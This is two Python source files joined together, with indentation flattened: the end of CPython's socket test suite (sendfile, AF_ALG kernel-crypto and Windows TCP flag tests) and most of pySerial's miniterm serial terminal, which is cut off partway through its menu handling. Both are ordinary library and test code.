def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertTrue(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
miniterm.py
|
#!C:\Users\reesj2\Downloads\WinPython-64bit-3.4.4.4Zero\python-3.4.4.amd64\python.exe
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import select
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
# an additional pipe is used in getkey, so that the cancel method
# can abort the waiting getkey method
self.pipe_r, self.pipe_w = os.pipe()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
ready, _, _ = select.select([self.enc_stdin, self.pipe_r], [], [], None)
if self.pipe_r in ready:
os.read(self.pipe_r, 1)
return
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
os.write(self.pipe_w, b"x")
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
